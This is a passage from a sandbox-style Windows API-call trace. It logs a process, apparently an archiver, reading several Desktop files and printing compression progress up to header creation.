lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 16 [0063.424] WideCharToMultiByte (in: CodePage=0x1, dwFlags=0x0, lpWideCharStr="video_driver.exe", cchWideChar=16, lpMultiByteStr=0x1c82010, cbMultiByte=16, lpDefaultChar=0x22e774, lpUsedDefaultChar=0x22e760 | out: lpMultiByteStr="video_driver.exe \r", lpUsedDefaultChar=0x22e760) returned 16 [0063.424] fputs (in: _Str="\r \r", _File=0x77032920 | out: _File=0x77032920) returned 0 [0063.426] fputs (in: _Str=" 65% 32 + video_driver.exe", _File=0x77032920 | out: _File=0x77032920) returned 0 [0063.426] fflush (in: _File=0x77032920 | out: _File=0x77032920) returned 0 [0063.427] free (_Block=0x1c8a2f8) [0063.427] malloc (_Size=0x58) returned 0x1c89330 [0063.427] malloc (_Size=0x8) returned 0x1c89eb8 [0063.427] malloc (_Size=0x6e) returned 0x1c86818 [0063.427] free (_Block=0x1c89eb8) [0063.427] malloc (_Size=0x6e) returned 0x1c867a0 [0063.427] free (_Block=0x1c86818) [0063.427] malloc (_Size=0xc) returned 0x1c899d8 [0063.427] malloc (_Size=0x6e) returned 0x1c86818 [0063.427] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\video_driver.exe" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\video_driver.exe"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xe8 [0063.427] free (_Block=0x1c867a0) [0063.427] ReadFile (in: hFile=0xe8, lpBuffer=0x240000, nNumberOfBytesToRead=0x20000, lpNumberOfBytesRead=0x22e8b0, lpOverlapped=0x0 | out: lpBuffer=0x240000*, lpNumberOfBytesRead=0x22e8b0*=0x20000, lpOverlapped=0x0) returned 1 [0063.431] SetEvent (hEvent=0xd4) returned 1 [0063.431] WaitForMultipleObjects (nCount=0x2, lpHandles=0x22e924*=0xd0, bWaitAll=0, dwMilliseconds=0xffffffff) returned 0x0 [0063.432] GetTickCount () returned 0x11474f2 [0063.432] strcmp (_Str1="+", _Str2="+") returned 0 [0063.432] wcscmp (_String1="video_driver.exe", _String2="video_driver.exe") returned 0 [0063.432] strlen (_Str="69") returned 0x2 [0063.432] strcmp (_Str1=" 69%", _Str2=" 65%") returned 1 [0063.432] WideCharToMultiByte (in: CodePage=0x1, dwFlags=0x0, lpWideCharStr="video_driver.exe", cchWideChar=16, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 16 [0063.432] WideCharToMultiByte (in: CodePage=0x1, dwFlags=0x0, lpWideCharStr="video_driver.exe", cchWideChar=16, lpMultiByteStr=0x1c82010, cbMultiByte=16, lpDefaultChar=0x22e87c, lpUsedDefaultChar=0x22e868 | out: lpMultiByteStr="video_driver.exe \r", lpUsedDefaultChar=0x22e868) returned 16 [0063.432] strcmp (_Str1=" 65% 32 + video_driver.exe", _Str2=" 69% 32 + video_driver.exe") returned -1 [0063.432] fputs (in: _Str="\r \r", _File=0x77032920 | out: _File=0x77032920) returned 0 [0063.433] fputs (in: _Str=" 69% 32 + video_driver.exe", _File=0x77032920 | out: _File=0x77032920) returned 0 [0063.434] fflush (in: _File=0x77032920 | out: _File=0x77032920) returned 0 [0063.434] ReadFile (in: hFile=0xe8, lpBuffer=0x240000, nNumberOfBytesToRead=0x20000, lpNumberOfBytesRead=0x22e8b0, lpOverlapped=0x0 | out: lpBuffer=0x240000*, lpNumberOfBytesRead=0x22e8b0*=0x20000, lpOverlapped=0x0) returned 1 [0063.436] SetEvent (hEvent=0xd4) returned 1 [0063.436] WaitForMultipleObjects (nCount=0x2, lpHandles=0x22e924*=0xd0, bWaitAll=0, dwMilliseconds=0xffffffff) returned 0x0 [0063.440] GetTickCount () returned 0x1147501 [0063.440] ReadFile (in: hFile=0xe8, lpBuffer=0x240000, nNumberOfBytesToRead=0x20000, lpNumberOfBytesRead=0x22e8b0, lpOverlapped=0x0 | out: lpBuffer=0x240000*, lpNumberOfBytesRead=0x22e8b0*=0x20000, lpOverlapped=0x0) returned 1 [0063.443] SetEvent (hEvent=0xd4) returned 1 [0063.443] WaitForMultipleObjects (nCount=0x2, lpHandles=0x22e924*=0xd0, bWaitAll=0, dwMilliseconds=0xffffffff) returned 0x0 [0063.446] GetTickCount () returned 0x1147501 [0063.446] ReadFile (in: hFile=0xe8, lpBuffer=0x240000, nNumberOfBytesToRead=0x20000, lpNumberOfBytesRead=0x22e8b0, lpOverlapped=0x0 | out: lpBuffer=0x240000*, lpNumberOfBytesRead=0x22e8b0*=0x20000, lpOverlapped=0x0) returned 1 [0063.448] SetEvent (hEvent=0xd4) returned 1 [0063.448] WaitForMultipleObjects (nCount=0x2, lpHandles=0x22e924*=0xd0, bWaitAll=0, dwMilliseconds=0xffffffff) returned 0x0 [0063.451] GetTickCount () returned 0x1147501 [0063.451] ReadFile (in: hFile=0xe8, lpBuffer=0x240000, nNumberOfBytesToRead=0x20000, lpNumberOfBytesRead=0x22e8b0, lpOverlapped=0x0 | out: lpBuffer=0x240000*, lpNumberOfBytesRead=0x22e8b0*=0x20000, lpOverlapped=0x0) returned 1 [0063.454] SetEvent (hEvent=0xd4) returned 1 [0063.454] WaitForMultipleObjects (nCount=0x2, lpHandles=0x22e924*=0xd0, bWaitAll=0, dwMilliseconds=0xffffffff) returned 0x0 [0063.544] GetTickCount () returned 0x114755f [0063.544] ReadFile (in: hFile=0xe8, lpBuffer=0x240000, nNumberOfBytesToRead=0x20000, lpNumberOfBytesRead=0x22e8b0, lpOverlapped=0x0 | out: lpBuffer=0x240000*, lpNumberOfBytesRead=0x22e8b0*=0x20000, lpOverlapped=0x0) returned 1 [0063.546] SetEvent (hEvent=0xd4) returned 1 [0063.551] WaitForMultipleObjects (nCount=0x2, lpHandles=0x22e924*=0xd0, bWaitAll=0, dwMilliseconds=0xffffffff) returned 0x0 [0063.551] GetTickCount () returned 0x114756f [0063.551] ReadFile (in: hFile=0xe8, lpBuffer=0x240000, nNumberOfBytesToRead=0x20000, lpNumberOfBytesRead=0x22e8b0, lpOverlapped=0x0 | out: lpBuffer=0x240000*, lpNumberOfBytesRead=0x22e8b0*=0x20b1, lpOverlapped=0x0) returned 1 [0063.553] SetEvent (hEvent=0xd4) returned 1 [0063.553] WaitForMultipleObjects (nCount=0x2, lpHandles=0x22e924*=0xd0, bWaitAll=0, dwMilliseconds=0xffffffff) returned 0x0 [0063.553] GetTickCount () returned 0x114756f [0063.553] ReadFile (in: hFile=0xe8, lpBuffer=0x240000, nNumberOfBytesToRead=0x20000, lpNumberOfBytesRead=0x22e8b0, lpOverlapped=0x0 | out: lpBuffer=0x240000*, lpNumberOfBytesRead=0x22e8b0*=0x0, lpOverlapped=0x0) returned 1 [0063.554] free (_Block=0x1c86818) [0063.554] free (_Block=0x1c899d8) [0063.554] CloseHandle (hObject=0xe8) returned 1 [0063.554] free (_Block=0x1c89330) [0063.554] SetEvent (hEvent=0xd4) returned 1 [0063.591] free (_Block=0x1c899c0) [0063.591] WaitForSingleObject (hHandle=0xe0, dwMilliseconds=0xffffffff) returned 0x0 [0063.592] free (_Block=0x1c89ea8) [0063.592] free (_Block=0x1c8ac80) [0063.592] free (_Block=0x1c82e58) [0063.592] free (_Block=0x0) [0063.592] free (_Block=0x0) [0063.592] free (_Block=0x0) [0063.592] malloc (_Size=0x8) returned 0x1c89ea8 [0063.592] malloc (_Size=0x22) returned 0x1c8a2f8 [0063.592] free (_Block=0x1c89ea8) [0063.592] malloc (_Size=0xc) returned 0x1c899c0 [0063.592] malloc (_Size=0x22) returned 0x1c8a2c8 [0063.592] free (_Block=0x1c8a2f8) [0063.592] free (_Block=0x27fbf0) [0063.592] free (_Block=0x27fbe0) [0063.592] free (_Block=0x27fb60) [0063.592] free (_Block=0x1c85bb8) [0063.592] GetTickCount () returned 0x114758e [0063.593] malloc (_Size=0x60) returned 0x1c85bb8 [0063.593] free (_Block=0x0) [0063.593] malloc (_Size=0x1) returned 0x27fb60 [0063.593] free (_Block=0x0) [0063.593] malloc (_Size=0x4) returned 0x27fbe0 [0063.593] free (_Block=0x0) [0063.593] malloc (_Size=0x8) returned 0x27fbf0 [0063.593] malloc (_Size=0x18) returned 0x1c8ac80 [0063.593] ResetEvent (hEvent=0xd0) returned 1 [0063.593] ResetEvent (hEvent=0xd4) returned 1 [0063.593] ResetEvent (hEvent=0xd8) returned 1 [0063.593] malloc (_Size=0x20) returned 0x1c82e58 [0063.593] realloc (_Block=0x0, _Size=0xa) returned 0x1c89990 [0063.593] strlen (_Str="93") returned 0x2 [0063.593] WideCharToMultiByte (in: CodePage=0x1, dwFlags=0x0, lpWideCharStr="vvdZxZXGy537svJ.mp4", cchWideChar=19, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 19 [0063.594] WideCharToMultiByte (in: CodePage=0x1, dwFlags=0x0, lpWideCharStr="vvdZxZXGy537svJ.mp4", cchWideChar=19, lpMultiByteStr=0x1c82010, cbMultiByte=19, lpDefaultChar=0x22e774, lpUsedDefaultChar=0x22e760 | out: lpMultiByteStr="vvdZxZXGy537svJ.mp4 \r", lpUsedDefaultChar=0x22e760) returned 19 [0063.594] fputs (in: _Str="\r \r", _File=0x77032920 | out: _File=0x77032920) returned 0 [0063.595] fputs (in: _Str=" 93% 33 + vvdZxZXGy537svJ.mp4", _File=0x77032920 | out: _File=0x77032920) returned 0 [0063.596] fflush (in: _File=0x77032920 | out: _File=0x77032920) returned 0 [0063.596] free (_Block=0x1c8a328) [0063.596] malloc (_Size=0x58) returned 0x1c89330 [0063.596] malloc (_Size=0x8) returned 0x1c89ed8 [0063.596] malloc (_Size=0x74) returned 0x1c86660 [0063.596] free (_Block=0x1c89ed8) [0063.596] malloc (_Size=0x74) returned 0x1c866e0 [0063.596] free (_Block=0x1c86660) [0063.596] malloc (_Size=0xc) returned 0x1c89a08 [0063.596] malloc (_Size=0x74) returned 0x1c86660 [0063.597] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\vvdZxZXGy537svJ.mp4" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\vvdzxzxgy537svj.mp4"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xe8 [0063.597] free (_Block=0x1c866e0) [0063.597] ReadFile (in: hFile=0xe8, lpBuffer=0x240000, nNumberOfBytesToRead=0x20000, lpNumberOfBytesRead=0x22e8b0, lpOverlapped=0x0 | out: lpBuffer=0x240000*, lpNumberOfBytesRead=0x22e8b0*=0xeac7, lpOverlapped=0x0) returned 1 [0063.599] SetEvent (hEvent=0xd4) returned 1 [0063.599] WaitForMultipleObjects (nCount=0x2, lpHandles=0x22e924*=0xd0, bWaitAll=0, dwMilliseconds=0xffffffff) returned 0x0 [0063.659] GetTickCount () returned 0x11475dc [0063.659] strcmp (_Str1="+", _Str2="+") returned 0 [0063.659] wcscmp (_String1="vvdZxZXGy537svJ.mp4", _String2="vvdZxZXGy537svJ.mp4") returned 0 [0063.659] strlen (_Str="95") returned 0x2 [0063.659] strcmp (_Str1=" 95%", _Str2=" 93%") returned 1 [0063.659] WideCharToMultiByte (in: CodePage=0x1, dwFlags=0x0, lpWideCharStr="vvdZxZXGy537svJ.mp4", cchWideChar=19, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 19 [0063.659] WideCharToMultiByte (in: CodePage=0x1, dwFlags=0x0, lpWideCharStr="vvdZxZXGy537svJ.mp4", cchWideChar=19, lpMultiByteStr=0x1c82010, cbMultiByte=19, lpDefaultChar=0x22e87c, lpUsedDefaultChar=0x22e868 | out: lpMultiByteStr="vvdZxZXGy537svJ.mp4 \r", lpUsedDefaultChar=0x22e868) returned 19 [0063.660] strcmp (_Str1=" 93% 33 + vvdZxZXGy537svJ.mp4", _Str2=" 95% 33 + vvdZxZXGy537svJ.mp4") returned -1 [0063.660] fputs (in: _Str="\r \r", _File=0x77032920 | out: _File=0x77032920) returned 0 [0063.661] fputs (in: _Str=" 95% 33 + vvdZxZXGy537svJ.mp4", _File=0x77032920 | out: _File=0x77032920) returned 0 [0063.662] fflush (in: _File=0x77032920 | out: _File=0x77032920) returned 0 [0063.662] ReadFile (in: hFile=0xe8, lpBuffer=0x240000, nNumberOfBytesToRead=0x20000, lpNumberOfBytesRead=0x22e8b0, lpOverlapped=0x0 | out: lpBuffer=0x240000*, lpNumberOfBytesRead=0x22e8b0*=0x0, lpOverlapped=0x0) returned 1 [0063.662] free (_Block=0x1c86660) [0063.662] free (_Block=0x1c89a08) [0063.662] CloseHandle (hObject=0xe8) returned 1 [0063.662] free (_Block=0x1c89330) [0063.662] SetEvent (hEvent=0xd4) returned 1 [0063.662] free (_Block=0x1c899f0) [0063.662] WaitForSingleObject (hHandle=0xe0, dwMilliseconds=0xffffffff) returned 0x0 [0063.666] free (_Block=0x1c89ec8) [0063.666] free (_Block=0x1c8aca0) [0063.666] free (_Block=0x1c82e58) [0063.666] free (_Block=0x0) [0063.666] free (_Block=0x0) [0063.666] free (_Block=0x0) [0063.667] malloc (_Size=0x8) returned 0x1c89ec8 [0063.667] malloc (_Size=0x28) returned 0x1c8a328 [0063.667] free (_Block=0x1c89ec8) [0063.667] malloc (_Size=0x2f) returned 0x1c87de8 [0063.667] wcscmp (_String1="vvdZxZXGy537svJ.mp4", _String2="vvdZxZXGy537svJ.mp4") returned 0 [0063.667] strlen (_Str="95") returned 0x2 [0063.667] WideCharToMultiByte (in: CodePage=0x1, dwFlags=0x0, lpWideCharStr="vvdZxZXGy537svJ.mp4", cchWideChar=19, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 19 [0063.667] WideCharToMultiByte (in: CodePage=0x1, dwFlags=0x0, lpWideCharStr="vvdZxZXGy537svJ.mp4", cchWideChar=19, lpMultiByteStr=0x1c82010, cbMultiByte=19, lpDefaultChar=0x22e9bc, lpUsedDefaultChar=0x22e9a8 | out: lpMultiByteStr="vvdZxZXGy537svJ.mp4 \r", lpUsedDefaultChar=0x22e9a8) returned 19 [0063.667] strcmp (_Str1=" 95% 33 + vvdZxZXGy537svJ.mp4", _Str2=" 95% 34 + vvdZxZXGy537svJ.mp4") returned -1 [0063.667] fputs (in: _Str="\r \r", _File=0x77032920 | out: _File=0x77032920) returned 0 [0063.668] fputs (in: _Str=" 95% 34 + vvdZxZXGy537svJ.mp4", _File=0x77032920 | out: _File=0x77032920) returned 0 [0063.669] fflush (in: _File=0x77032920 | out: _File=0x77032920) returned 0 [0063.669] malloc (_Size=0x60) returned 0x1c85bb8 [0063.669] free (_Block=0x0) [0063.669] malloc (_Size=0x1) returned 0x27fb60 [0063.669] free (_Block=0x0) [0063.669] malloc (_Size=0x4) returned 0x27fbe0 [0063.669] free (_Block=0x0) [0063.669] malloc (_Size=0x8) returned 0x27fbf0 [0063.669] malloc (_Size=0x18) returned 0x1c8aca0 [0063.669] ResetEvent (hEvent=0xd0) returned 1 [0063.669] ResetEvent (hEvent=0xd4) returned 1 [0063.670] ResetEvent (hEvent=0xd8) returned 1 [0063.670] malloc (_Size=0x20) returned 0x1c82e58 [0063.670] realloc (_Block=0x0, _Size=0xa) returned 0x1c899f0 [0063.670] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\Yt6rrVQUgdZ1oPy.gif" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\yt6rrvqugdz1opy.gif"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xe8 [0063.670] free (_Block=0x1c89420) [0063.670] ReadFile (in: hFile=0xe8, lpBuffer=0x240000, nNumberOfBytesToRead=0x20000, lpNumberOfBytesRead=0x22e8b0, lpOverlapped=0x0 | out: lpBuffer=0x240000*, lpNumberOfBytesRead=0x22e8b0*=0xb18e, lpOverlapped=0x0) returned 1 [0063.672] SetEvent (hEvent=0xd4) returned 1 [0063.672] WaitForMultipleObjects (nCount=0x2, lpHandles=0x22e924*=0xd0, bWaitAll=0, dwMilliseconds=0xffffffff) returned 0x0 [0063.673] GetTickCount () returned 0x11475dc [0063.673] strcmp (_Str1="+", _Str2="+") returned 0 [0063.673] wcscmp (_String1="vvdZxZXGy537svJ.mp4", _String2="Yt6rrVQUgdZ1oPy.gif") returned 1 [0063.673] strlen (_Str="97") returned 0x2 [0063.673] WideCharToMultiByte (in: CodePage=0x1, dwFlags=0x0, lpWideCharStr="Yt6rrVQUgdZ1oPy.gif", cchWideChar=19, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 19 [0063.673] WideCharToMultiByte (in: CodePage=0x1, dwFlags=0x0, lpWideCharStr="Yt6rrVQUgdZ1oPy.gif", cchWideChar=19, lpMultiByteStr=0x1c82010, cbMultiByte=19, lpDefaultChar=0x22e87c, lpUsedDefaultChar=0x22e868 | out: lpMultiByteStr="Yt6rrVQUgdZ1oPy.gif \r", lpUsedDefaultChar=0x22e868) returned 19 [0063.673] strcmp (_Str1=" 95% 34 + vvdZxZXGy537svJ.mp4", _Str2=" 97% 34 + Yt6rrVQUgdZ1oPy.gif") returned -1 [0063.673] fputs (in: _Str="\r \r", _File=0x77032920 | out: _File=0x77032920) returned 0 [0063.674] fputs (in: _Str=" 97% 34 + Yt6rrVQUgdZ1oPy.gif", _File=0x77032920 | out: _File=0x77032920) returned 0 [0063.675] fflush (in: _File=0x77032920 | out: _File=0x77032920) returned 0 [0063.675] ReadFile (in: hFile=0xe8, lpBuffer=0x240000, nNumberOfBytesToRead=0x20000, lpNumberOfBytesRead=0x22e8b0, lpOverlapped=0x0 | out: lpBuffer=0x240000*, lpNumberOfBytesRead=0x22e8b0*=0x0, lpOverlapped=0x0) returned 1 [0063.675] free (_Block=0x1c893a0) [0063.675] free (_Block=0x1c89a38) [0063.675] CloseHandle (hObject=0xe8) returned 1 [0063.676] free (_Block=0x1c86728) [0063.676] SetEvent (hEvent=0xd4) returned 1 [0063.676] free (_Block=0x1c89a20) [0063.676] WaitForSingleObject (hHandle=0xe0, dwMilliseconds=0xffffffff) returned 0x0 [0063.678] free (_Block=0x1c89ee8) [0063.678] free (_Block=0x1c8acc0) [0063.678] free (_Block=0x1c82e58) [0063.678] free (_Block=0x0) [0063.678] free (_Block=0x0) [0063.678] free (_Block=0x0) [0063.678] malloc (_Size=0x8) returned 0x1c89ee8 [0063.678] malloc (_Size=0x28) returned 0x1c8a238 [0063.678] free (_Block=0x1c89ee8) [0063.678] malloc (_Size=0xc) returned 0x1c899f0 [0063.678] malloc (_Size=0x28) returned 0x1c8a328 [0063.678] free (_Block=0x1c8a238) [0063.678] free (_Block=0x27fbf0) [0063.678] free (_Block=0x27fbe0) [0063.678] free (_Block=0x27fb60) [0063.678] free (_Block=0x1c85bb8) [0063.678] GetTickCount () returned 0x11475eb [0063.679] malloc (_Size=0x60) returned 0x1c85bb8 [0063.679] free (_Block=0x0) [0063.679] malloc (_Size=0x1) returned 0x27fb60 [0063.679] free (_Block=0x0) [0063.679] malloc (_Size=0x4) returned 0x27fbe0 [0063.679] free (_Block=0x0) [0063.679] malloc (_Size=0x8) returned 0x27fbf0 [0063.679] malloc (_Size=0x18) returned 0x1c8acc0 [0063.679] ResetEvent (hEvent=0xd0) returned 1 [0063.679] ResetEvent (hEvent=0xd4) returned 1 [0063.679] ResetEvent (hEvent=0xd8) returned 1 [0063.679] malloc (_Size=0x20) returned 0x1c82e58 [0063.679] realloc (_Block=0x0, _Size=0xa) returned 0x1c89a20 [0063.679] strlen (_Str="97") returned 0x2 [0063.679] WideCharToMultiByte (in: CodePage=0x1, dwFlags=0x0, lpWideCharStr="ZToX37-PbNpvd.pps", cchWideChar=17, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 17 [0063.680] WideCharToMultiByte (in: CodePage=0x1, dwFlags=0x0, lpWideCharStr="ZToX37-PbNpvd.pps", cchWideChar=17, lpMultiByteStr=0x1c82010, cbMultiByte=17, lpDefaultChar=0x22e774, lpUsedDefaultChar=0x22e760 | out: lpMultiByteStr="ZToX37-PbNpvd.pps \r", lpUsedDefaultChar=0x22e760) returned 17 [0063.680] fputs (in: _Str="\r \r", _File=0x77032920 | out: _File=0x77032920) returned 0 [0063.681] fputs (in: _Str=" 97% 35 + ZToX37-PbNpvd.pps", _File=0x77032920 | out: _File=0x77032920) returned 0 [0063.681] fflush (in: _File=0x77032920 | out: _File=0x77032920) returned 0 [0063.682] free (_Block=0x1c8a208) [0063.682] malloc (_Size=0x58) returned 0x1c86728 [0063.682] malloc (_Size=0x8) returned 0x1c89f18 [0063.682] malloc (_Size=0x70) returned 0x1c86818 [0063.682] free (_Block=0x1c89f18) [0063.682] malloc (_Size=0x70) returned 0x1c867a0 [0063.682] free (_Block=0x1c86818) [0063.682] malloc (_Size=0xc) returned 0x1c89a68 [0063.682] malloc (_Size=0x70) returned 0x1c86818 [0063.682] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\ZToX37-PbNpvd.pps" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\ztox37-pbnpvd.pps"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xe8 [0063.682] free (_Block=0x1c867a0) [0063.682] ReadFile (in: hFile=0xe8, lpBuffer=0x240000, nNumberOfBytesToRead=0x20000, lpNumberOfBytesRead=0x22e8b0, lpOverlapped=0x0 | out: lpBuffer=0x240000*, lpNumberOfBytesRead=0x22e8b0*=0x112c4, lpOverlapped=0x0) returned 1 [0063.685] SetEvent (hEvent=0xd4) returned 1 [0063.685] WaitForMultipleObjects (nCount=0x2, lpHandles=0x22e924*=0xd0, bWaitAll=0, dwMilliseconds=0xffffffff) returned 0x0 [0063.685] GetTickCount () returned 0x11475eb [0063.685] strcmp (_Str1="+", _Str2="+") returned 0 [0063.685] wcscmp (_String1="ZToX37-PbNpvd.pps", _String2="ZToX37-PbNpvd.pps") returned 0 [0063.685] strlen (_Str="100") returned 0x3 [0063.685] strcmp (_Str1="100%", _Str2=" 97%") returned 1 [0063.686] WideCharToMultiByte (in: CodePage=0x1, dwFlags=0x0, lpWideCharStr="ZToX37-PbNpvd.pps", cchWideChar=17, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 17 [0063.686] WideCharToMultiByte (in: CodePage=0x1, dwFlags=0x0, lpWideCharStr="ZToX37-PbNpvd.pps", cchWideChar=17, lpMultiByteStr=0x1c82010, cbMultiByte=17, lpDefaultChar=0x22e87c, lpUsedDefaultChar=0x22e868 | out: lpMultiByteStr="ZToX37-PbNpvd.pps \r", lpUsedDefaultChar=0x22e868) returned 17 [0063.686] strcmp (_Str1=" 97% 35 + ZToX37-PbNpvd.pps", _Str2="100% 35 + ZToX37-PbNpvd.pps") returned -1 [0063.686] fputs (in: _Str="\r \r", _File=0x77032920 | out: _File=0x77032920) returned 0 [0063.687] fputs (in: _Str="100% 35 + ZToX37-PbNpvd.pps", _File=0x77032920 | out: _File=0x77032920) returned 0 [0063.687] fflush (in: _File=0x77032920 | out: _File=0x77032920) returned 0 [0063.688] ReadFile (in: hFile=0xe8, lpBuffer=0x240000, nNumberOfBytesToRead=0x20000, lpNumberOfBytesRead=0x22e8b0, lpOverlapped=0x0 | out: lpBuffer=0x240000*, lpNumberOfBytesRead=0x22e8b0*=0x0, lpOverlapped=0x0) returned 1 [0063.688] free (_Block=0x1c86818) [0063.688] free (_Block=0x1c89a68) [0063.688] CloseHandle (hObject=0xe8) returned 1 [0063.688] free (_Block=0x1c86728) [0063.688] SetEvent (hEvent=0xd4) returned 1 [0063.688] free (_Block=0x1c89a50) [0063.688] WaitForSingleObject (hHandle=0xe0, dwMilliseconds=0xffffffff) returned 0x0 [0063.691] free (_Block=0x1c89f08) [0063.691] free (_Block=0x1c8ace0) [0063.692] free (_Block=0x1c82e58) [0063.692] free (_Block=0x0) [0063.692] free (_Block=0x0) [0063.692] free (_Block=0x0) [0063.692] malloc (_Size=0x8) returned 0x1c89f08 [0063.692] malloc (_Size=0x24) returned 0x1c8a208 [0063.692] free (_Block=0x1c89f08) [0063.692] malloc (_Size=0xc) returned 0x1c89a20 [0063.692] malloc (_Size=0x24) returned 0x1c8a238 [0063.692] free (_Block=0x1c8a208) [0063.692] free (_Block=0x27fbf0) [0063.692] free (_Block=0x27fbe0) [0063.692] free (_Block=0x27fb60) [0063.692] free (_Block=0x1c85bb8) [0063.692] free (_Block=0x1c85b20) [0063.692] free (_Block=0x1c85848) [0063.692] free (_Block=0x27fc70) [0063.692] free (_Block=0x27fc80) [0063.692] free (_Block=0x27fbb0) [0063.692] free (_Block=0x27f580) [0063.693] free (_Block=0x27fb50) [0063.693] free (_Block=0x27fc20) [0063.693] free (_Block=0x27fc10) [0063.693] free (_Block=0x27fc30) [0063.693] free (_Block=0x27fbc0) [0063.693] free (_Block=0x1c82170) [0063.693] free (_Block=0x0) [0063.693] free (_Block=0x0) [0063.693] free (_Block=0x1c82d18) [0063.693] free (_Block=0x1c806e0) [0063.693] free (_Block=0x1c806c0) [0063.693] free (_Block=0x27fbd0) [0063.693] free (_Block=0x1c82cf0) [0063.693] free (_Block=0x27fc60) [0063.693] SetEvent (hEvent=0xdc) returned 1 [0063.693] WaitForSingleObject (hHandle=0xe4, dwMilliseconds=0xffffffff) returned 0x0 [0063.695] CloseHandle (hObject=0xe4) returned 1 [0063.695] free (_Block=0x1c83bb0) [0063.696] free (_Block=0x1c83bc0) [0063.696] free (_Block=0x1c83b90) [0063.696] free (_Block=0x1c83ba0) [0063.696] free (_Block=0x1c83c20) [0063.696] free (_Block=0x1c83c10) [0063.696] SetEvent (hEvent=0xdc) returned 1 [0063.696] CloseHandle (hObject=0xe0) returned 1 [0063.696] CloseHandle (hObject=0xdc) returned 1 [0063.696] free (_Block=0x1c83b10) [0063.696] free (_Block=0x1c83b00) [0063.696] free (_Block=0x1c85dc8) [0063.696] free (_Block=0x1c82220) [0063.696] free (_Block=0x1c821c8) [0063.696] free (_Block=0x1c84d00) [0063.696] free (_Block=0x1c83c30) [0063.696] free (_Block=0x1c85d40) [0063.696] VirtualFree (lpAddress=0x2050000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0063.720] free (_Block=0x1c85f20) [0063.720] free (_Block=0x1c85fc0) [0063.720] free (_Block=0x1c83b70) [0063.720] free (_Block=0x1c83b80) [0063.720] free (_Block=0x1c83b50) [0063.720] free (_Block=0x1c83b60) [0063.720] free (_Block=0x1c83be0) [0063.721] free (_Block=0x1c83bd0) [0063.721] free (_Block=0x1c83af0) [0063.721] free (_Block=0x27fb30) [0063.721] VirtualFree (lpAddress=0x240000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0063.722] free (_Block=0x1c83580) [0063.722] free (_Block=0x1c85cb0) [0063.722] free (_Block=0x27fb20) [0063.722] CloseHandle (hObject=0xd8) returned 1 [0063.723] CloseHandle (hObject=0xd4) returned 1 [0063.723] CloseHandle (hObject=0xd0) returned 1 [0063.723] free (_Block=0x1c82d40) [0063.723] free (_Block=0x27faa0) [0063.723] free (_Block=0x27fab0) [0063.723] free (_Block=0x1c80a80) [0063.723] free (_Block=0x27fa80) [0063.723] free (_Block=0x27fac0) [0063.723] free (_Block=0x27fa70) [0063.723] free (_Block=0x27fc40) [0063.723] free (_Block=0x27fc90) [0063.723] free (_Block=0x1c85c20) [0063.723] free (_Block=0x1c82118) [0063.723] free (_Block=0x0) [0063.723] free (_Block=0x1c80680) [0063.723] free (_Block=0x1c80600) [0063.724] free (_Block=0x27fb90) [0063.724] free (_Block=0x1c82cc8) [0063.724] free (_Block=0x27fb70) [0063.724] GetTickCount () returned 0x114761a [0063.724] malloc (_Size=0x90) returned 0x1c893a0 [0063.724] strlen (_Str="100") returned 0x3 [0063.724] fputs (in: _Str="\r \r", _File=0x77032920 | out: _File=0x77032920) returned 0 [0063.792] fputs (in: _Str="100% 36 Header creation", _File=0x77032920 | out: _File=0x77032920) returned 0 [0063.793] fflush (in: _File=0x77032920 | out: _File=0x77032920) returned 0 [0063.793] malloc (_Size=0x10) returned 0x1c89a50 [0063.793] free (_Block=0x1c80aa0) [0063.793] free (_Block=0x27fb70) [0063.793] free (_Block=0x1c852f8) [0063.793] free (_Block=0x0) [0063.793] free (_Block=0x0) [0063.793] free (_Block=0x0) [0063.793] free (_Block=0x0) [0063.793] free (_Block=0x0) [0063.793] free (_Block=0x0) [0063.793] CloseHandle (hObject=0xcc) returned 1 [0063.793] 